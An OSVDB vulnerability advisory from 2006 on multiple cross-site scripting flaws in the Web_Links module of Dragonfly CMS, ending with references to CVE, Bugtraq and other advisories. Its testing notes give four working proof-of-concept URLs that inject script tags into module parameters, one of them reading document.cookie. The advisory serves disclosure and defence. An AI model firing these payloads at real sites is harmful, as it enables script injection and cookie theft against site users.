CPG Dragonfly CMS Web_Links Module Multiple Variable XSS

2006-02-22T07:17:34
ID OSVDB:23411
Type osvdb
Reporter OSVDB
Modified 2006-02-22T07:17:34

Description

Manual Testing Notes

http://[target]/index.php?name=Web_Links&l_op=viewlink&cid=15&min=10&orderby=title%20ASC&show=0"><script>alert(document.cookie)</script> http://[target]/index.php?name=Web_Links&l_op=viewlink&cid=15"><script>alert()</script> http://[target]/index.php?name=Web_Links&l_op=toprated&ratenum=5&ratetype=percent"><script>alert()</script> http://[target]/index.php?name=Web_Links&l_op=viewlink&cid=15&orderby=titled"><script>alert()</script>

References:

Vendor URL: http://dragonflycms.org/ Security Tracker: 1015661 Secunia Advisory ID:18940 Related OSVDB ID: 23408 Related OSVDB ID: 23410 Related OSVDB ID: 23409 Related OSVDB ID: 23412 Related OSVDB ID: 23413 Related OSVDB ID: 23414 Related OSVDB ID: 23415 Other Advisory URL: http://lostmon.blogspot.com/2006/02/multiple-cross-site-scripting-in.html FrSIRT Advisory: ADV-2006-0688 CVE-2006-1033 Bugtraq ID: 16784